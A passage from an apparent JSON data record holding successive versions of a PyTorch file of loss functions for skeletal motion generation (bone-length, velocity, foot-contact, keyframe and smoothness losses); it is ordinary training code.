MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, \n 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4,\n 4, 0, 0, 0]\n weight_sum = []\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim),\n dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=\n torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part:part + 1] = factor[:, part:part + 1\n ] + weight[j] / weight_sum[part] * pow(pow(\n velocity[:, i:i + 1, j * 3], 2) + pow(velocity[\n :, i:i + 1, j * 3 + 1], 2) + pow(velocity[:, i:\n i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-4": "import torch\nimport torch.nn as nn\n\n\nclass ReconstructionLoss(nn.Module):\n\n def __init__(self, config):\n super(ReconstructionLoss, self).__init__()\n self.velocity_dim = config.velocity_dim\n\n def forward(self, pre_seq, gt_seq):\n MSE_loss = nn.MSELoss()\n rec_loss = MSE_loss(pre_seq[:, 1:-1, :], gt_seq[:, 1:-1, :]\n ) + MSE_loss(pre_seq[:, -1, :], gt_seq[:, -1, :]) + MSE_loss(\n pre_seq[:, 0, :-self.velocity_dim], gt_seq[:, 0, :-self.\n velocity_dim])\n return rec_loss * 3\n\n\nclass BoneLoss(nn.Module):\n\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n\n def calculate_bone_length_for_seq(self, seq):\n src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim\n ] + self._mean[:self.pos_dim]\n new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3), 3)\n root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.\n device)\n root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)\n root_positions = root_positions.repeat(src_seq.shape[0], src_seq.\n shape[1], 1, 1)\n positions = torch.cat((root_positions, new_seq), 2)\n result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(\n src_seq.shape[2] / 3)), dtype=torch.float32).to(self.device)\n index = 0\n for joint, parent in enumerate(self.parents):\n if parent == -1:\n continue\n joint_pos = positions[:, :, joint]\n parent_pos = positions[:, :, parent]\n delta_x = joint_pos[..., 0] - parent_pos[..., 0]\n delta_y = joint_pos[..., 1] - parent_pos[..., 1]\n delta_z = joint_pos[..., 2] - parent_pos[..., 2]\n length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5\n result_list[..., index] = length_temp\n index += 1\n return result_list\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self\n .gt_bone_length)\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, \n 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4,\n 4, 0, 0, 0]\n weight_sum = []\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim),\n dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=\n torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part:part + 1] = factor[:, part:part + 1\n ] + weight[j] / weight_sum[part] * pow(pow(\n velocity[:, i:i + 1, j * 3], 2) + pow(velocity[\n :, i:i + 1, j * 3 + 1], 2) + pow(velocity[:, i:\n i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n _train_velocity = (train_velocity - self._mean[-(self.velocity_dim +\n self.vel_factor_dim):-self.vel_factor_dim]) / self._std[-(self.\n velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n train_vel_factor = self.get_vel_factor(train_velocity)\n _train_vel_factor = (train_vel_factor - self._mean[-self.\n vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape\n ).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:],\n _train_velocity[:, 1:, :]) * 10 + MSE_loss(predict_seq[:, 0, -\n self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:,\n 1:, :]) * 10\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = (self.contact_dim + self.velocity_dim + self.\n vel_factor_dim)\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot,\n right_foot):\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1),\n src_pos_seq), 1)\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:left_foot[\n 0] * 3 + 3] - temp_positions[:, :-1, left_foot[0] * 3:left_foot\n [0] * 3 + 3]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:left_foot[\n 1] * 3 + 3] - temp_positions[:, :-1, left_foot[1] * 3:left_foot\n [1] * 3 + 3]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:\n right_foot[0] * 3 + 3] - temp_positions[:, :-1, right_foot[0] *\n 3:right_foot[0] * 3 + 3]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:\n right_foot[1] * 3 + 3] - temp_positions[:, :-1, right_foot[1] *\n 3:right_foot[1] * 3 + 3]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel,\n right_foot0_vel, right_foot1_vel), -1)\n return feet_vel\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = predict_seq[..., :self.pos_dim + self.root_pos_dim\n ] * self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:\n self.pos_dim + self.root_pos_dim]\n src_init_pos = init_pos * self._std[:self.pos_dim + self.root_pos_dim\n ] + self._mean[:self.pos_dim + self.root_pos_dim]\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos,\n self.left_feet, self.right_feet)\n feet_contact = torch.abs(predict_seq[..., -(self.contact_dim + self\n .velocity_dim):-self.velocity_dim] * self._std[-self.\n contact_loc:-(self.velocity_dim + self.vel_factor_dim)] + self.\n _mean[-self.contact_loc:-(self.velocity_dim + self.vel_factor_dim)]\n )\n contact_loss = torch.mean(torch.sum(torch.sum(feet_contact *\n feet_vels, dim=-1), dim=-1))\n return contact_loss * 2\n\n\nclass KeyframeLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n self.key_num = config.key_num\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n key_frame1 = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n key_frame2 = gt_seq[:, -1, :self.pos_dim + self.root_pos_dim + self\n .root_rot_dim]\n predict_pos = predict_seq[:, :, :self.pos_dim + self.root_pos_dim +\n self.root_rot_dim]\n num = predict_pos.shape[1]\n MSE_loss = nn.MSELoss()\n loss = torch.zeros([]).to(self.device)\n if num <= self.key_num * 2:\n for i in range(num):\n t = (i + 1) / (num + 1)\n pos = predict_pos[:, i, :]\n loss = loss + (1 - t) * MSE_loss(pos, key_frame1\n ) + t * MSE_loss(pos, key_frame2)\n else:\n for i in range(self.key_num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame1)\n for i in range(num - self.key_num, num):\n loss = loss + MSE_loss(predict_pos[:, i, :], key_frame2)\n return loss * 2\n\n\nclass SmoothLoss(nn.Module):\n\n def __init__(self, config):\n super().__init__()\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.root_rot_dim = config.root_rot_dim\n self.pos_dim = config.pos_dim\n\n def forward(self, predict_seq, _train_x1, gt_seq):\n init_root_pos = _train_x1[:, :1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n init_root_rot = _train_x1[:, :1, self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n root_pos_seq = predict_seq[..., self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n root_rot_seq = predict_seq[..., self.pos_dim + self.root_pos_dim:\n self.pos_dim + self.root_pos_dim + self.root_rot_dim]\n last_root_pos = gt_seq[:, -1, self.pos_dim:self.pos_dim + self.\n root_pos_dim]\n last_root_rot = gt_seq[:, -1, self.pos_dim + self.root_pos_dim:self\n .pos_dim + self.root_pos_dim + self.root_rot_dim]\n seq_num = len(root_pos_seq[0])\n batch_size = len(root_pos_seq)\n root_pos_item = torch.zeros([]).to(self.device)\n root_rot_item = torch.zeros([]).to(self.device)\n MSE_loss = nn.MSELoss()\n for idx in range(seq_num):\n if idx == 0:\n root_pos_temp = MSE_loss(root_pos_seq[:, :1, :],\n init_root_pos[:])\n root_rot_temp = MSE_loss(root_rot_seq[:, :1, :],\n init_root_rot[:])\n elif idx == seq_num - 1:\n root_pos_temp = MSE_loss(root_pos_seq[:, idx, :], last_root_pos\n ) + MSE_loss(root_pos_seq[:, idx - 1, :], last_root_pos)\n root_rot_temp = MSE_loss(root_rot_seq[:, idx, :], last_root_rot\n ) + MSE_loss(root_rot_seq[:, idx - 1, :], last_root_rot)\n else:\n root_pos_temp = torch.sum(torch.pow(root_pos_seq[:, idx, :] -\n root_pos_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_rot_temp = torch.sum(torch.pow(root_rot_seq[:, idx, :] -\n root_rot_seq[:, idx - 1, :], 2)) / batch_size / seq_num\n root_pos_item = root_pos_item + root_pos_temp\n root_rot_item = root_rot_item + root_rot_temp\n loss = root_pos_item + root_rot_item\n return loss * 1.5\n",
"step-5": "import torch\nimport torch.nn as nn\n\n\nclass ReconstructionLoss(nn.Module):\n def __init__(self, config):\n super(ReconstructionLoss, self).__init__()\n self.velocity_dim = config.velocity_dim\n\n def forward(self, pre_seq, gt_seq):\n MSE_loss = nn.MSELoss()\n rec_loss = MSE_loss(pre_seq[:, 1:-1, :], gt_seq[:, 1:-1, :])+ \\\n MSE_loss(pre_seq[:, -1, :], gt_seq[:, -1, :]) + \\\n MSE_loss(pre_seq[:, 0, :-self.velocity_dim], gt_seq[:, 0, :-self.velocity_dim])\n return rec_loss * 3\n\n\nclass BoneLoss(nn.Module):\n def __init__(self, gt_bone_length, parents, _mean, _std, config):\n super(BoneLoss, self).__init__()\n self.gt_bone_length = gt_bone_length\n self.parents = parents\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.pos_dim = config.pos_dim\n\n def calculate_bone_length_for_seq(self, seq):\n # AddBackward0 [batch_size, T, size]\n src_seq = seq[..., :self.pos_dim] * self._std[:self.pos_dim] + self._mean[:self.pos_dim]\n\n # ViewBackward [batch_size, T, J-1, 3]\n new_seq = src_seq.view(src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3), 3)\n\n root_pos = torch.tensor([[0, 0, 0]], dtype=torch.float32).to(self.device)\n root_positions = torch.unsqueeze(torch.unsqueeze(root_pos, 0), 0)\n root_positions = root_positions.repeat(src_seq.shape[0], src_seq.shape[1], 1, 1)\n # CatBackward [batch_size, T, J, 3]\n positions = torch.cat((root_positions, new_seq), 2)\n\n # [200, 6, 23]\n result_list = torch.empty((src_seq.shape[0], src_seq.shape[1], int(src_seq.shape[2] / 3)),\n dtype=torch.float32).to(self.device)\n index = 0\n for joint, parent in enumerate(self.parents):\n if parent == -1:\n continue\n # [200, 6, 3] SelectBackward\n joint_pos = positions[:, :, joint]\n parent_pos = positions[:, :, parent]\n # [200, 6] SubBackward0\n delta_x = joint_pos[..., 0] - parent_pos[..., 0]\n delta_y = joint_pos[..., 1] - parent_pos[..., 1]\n delta_z = joint_pos[..., 2] - parent_pos[..., 2]\n # [200, 6] PowBackward0\n length_temp = (delta_x ** 2 + delta_y ** 2 + delta_z ** 2) ** 0.5\n result_list[..., index] = length_temp\n index += 1\n return result_list\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n train_bone_length = self.calculate_bone_length_for_seq(predict_seq)\n _, gt_bone_length = torch.broadcast_tensors(train_bone_length, self.gt_bone_length)\n\n MSE_loss = nn.MSELoss()\n bone_loss = MSE_loss(train_bone_length, gt_bone_length)\n\n return bone_loss * 2\n\n\nclass VelocityLoss(nn.Module):\n def __init__(self, _mean, _std, config):\n super(VelocityLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.device = config.device\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.velocity_dim = config.velocity_dim\n self.vel_factor_dim = config.vel_factor_dim\n\n def calculate_velocity(self, src_pos_seq, src_init_pos):\n \"\"\"\n :param pos_seq: the position of predict sequence [Batch_size, seq_length, J * 3]\n :param init_pos: the position of initial frame\n :return:\n \"\"\"\n # [batch_size, T + 1, J * 3] grad_fn=<CatBackward>\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)\n velocity = temp_positions[:, 1:] - temp_positions[:, :-1]\n return velocity\n\n def get_vel_factor(self, velocity):\n batch_size = velocity.shape[0]\n seq_len = velocity.shape[1]\n joint_num = int(velocity.shape[-1] / 3)\n weight = [1, 2, 3, 4, 1, 2, 3, 4, 1, 1, 1, 1, 1, 1, 2, 3, 4, 1, 2, 3, 4, 1, 2, 1]\n parts = [1, 1, 1, 1, 2, 2, 2, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 4, 4, 4, 4, 0, 0, 0]\n weight_sum = []\n\n for part in range(5):\n p_sum = 0\n for j in range(joint_num):\n if parts[j] == part:\n p_sum += weight[j]\n weight_sum.append(p_sum)\n\n vel_factor = torch.empty((batch_size, seq_len, self.vel_factor_dim), dtype=torch.float32).to(self.device)\n for i in range(seq_len):\n factor = torch.zeros((batch_size, self.vel_factor_dim), dtype=torch.float32).to(self.device)\n for part in range(5):\n for j in range(joint_num):\n if parts[j] == part:\n factor[:, part: part + 1] = factor[:, part: part + 1] + weight[j] / weight_sum[part] * \\\n pow(pow(velocity[:, i:i + 1, j * 3], 2) +\n pow(velocity[:, i:i + 1, j * 3 + 1], 2) +\n pow(velocity[:, i:i + 1, j * 3 + 2], 2), 0.5)\n vel_factor[:, i, :] = factor\n\n return vel_factor\n\n def forward(self, predict_seq, _train_x1, _train_x2, _true_vel_factor):\n # velocity\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n src_init_pos = (init_pos *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n\n train_velocity = self.calculate_velocity(src_pos_seq, src_init_pos)\n\n # grad_fn=<DivBackward0>\n _train_velocity = (train_velocity -\n self._mean[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]) \\\n / self._std[-(self.velocity_dim + self.vel_factor_dim):-self.vel_factor_dim]\n\n train_vel_factor = self.get_vel_factor(train_velocity)\n\n _train_vel_factor = (train_vel_factor - self._mean[-self.vel_factor_dim:]) / self._std[-self.vel_factor_dim:]\n\n\n MSE_loss = nn.MSELoss()\n zero_seq = torch.zeros(predict_seq[:, 0, -self.velocity_dim:].shape).to(self.device)\n loss1 = MSE_loss(predict_seq[:, 1:, -self.velocity_dim:], _train_velocity[:, 1:, :]) * 10 \\\n + MSE_loss(predict_seq[:, 0, -self.velocity_dim:], zero_seq) * 20\n loss2 = MSE_loss(_true_vel_factor[:, 1:-1, :], _train_vel_factor[:, 1:, :]) * 10\n\n velocity_loss = loss1 * 2 + loss2 * 1.5\n return velocity_loss\n\n\nclass ContactLoss(nn.Module):\n def __init__(self, _mean, _std, config):\n super(ContactLoss, self).__init__()\n self._mean = _mean\n self._std = _std\n self.root_pos_dim = config.root_pos_dim\n self.pos_dim = config.pos_dim\n self.contact_dim = config.contact_dim\n self.velocity_dim = config.velocity_dim\n self.left_feet = config.left_foot\n self.right_feet = config.right_foot\n self.vel_factor_dim = config.vel_factor_dim\n self.contact_loc = self.contact_dim + self.velocity_dim + self.vel_factor_dim\n\n def calculate_foot_vels(self, src_pos_seq, src_init_pos, left_foot, right_foot):\n # [batch_size, T + 1, J * 3] grad_fn=<CatBackward>\n temp_positions = torch.cat((torch.unsqueeze(src_init_pos, 1), src_pos_seq), 1)\n\n left_foot0_vel = (temp_positions[:, 1:, left_foot[0] * 3:(left_foot[0] * 3 + 3)]\n - temp_positions[:, :-1, left_foot[0] * 3:(left_foot[0] * 3 + 3)]) ** 2\n left_foot0_vel = torch.sum(left_foot0_vel, -1, keepdim=True)\n left_foot1_vel = (temp_positions[:, 1:, left_foot[1] * 3:(left_foot[1] * 3 + 3)]\n - temp_positions[:, :-1, left_foot[1] * 3:(left_foot[1] * 3 + 3)]) ** 2\n left_foot1_vel = torch.sum(left_foot1_vel, -1, keepdim=True)\n right_foot0_vel = (temp_positions[:, 1:, right_foot[0] * 3:(right_foot[0] * 3 + 3)]\n - temp_positions[:, :-1, right_foot[0] * 3:(right_foot[0] * 3 + 3)]) ** 2\n right_foot0_vel = torch.sum(right_foot0_vel, -1, keepdim=True)\n right_foot1_vel = (temp_positions[:, 1:, right_foot[1] * 3:(right_foot[1] * 3 + 3)]\n - temp_positions[:, :-1, right_foot[1] * 3:(right_foot[1] * 3 + 3)]) ** 2\n right_foot1_vel = torch.sum(right_foot1_vel, -1, keepdim=True)\n feet_vel = torch.cat((left_foot0_vel, left_foot1_vel, right_foot0_vel, right_foot1_vel), -1)\n return feet_vel # [batch_size, seq_size, 4]\n\n def forward(self, predict_seq, _train_x1, _train_x2):\n init_pos = _train_x1[:, 0, :self.pos_dim + self.root_pos_dim]\n src_pos_seq = (predict_seq[..., :self.pos_dim + self.root_pos_dim] *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n src_init_pos = (init_pos *\n self._std[:self.pos_dim + self.root_pos_dim] + self._mean[:self.pos_dim + self.root_pos_dim])\n feet_vels = self.calculate_foot_vels(src_pos_seq, src_init_pos, self.left_feet,\n 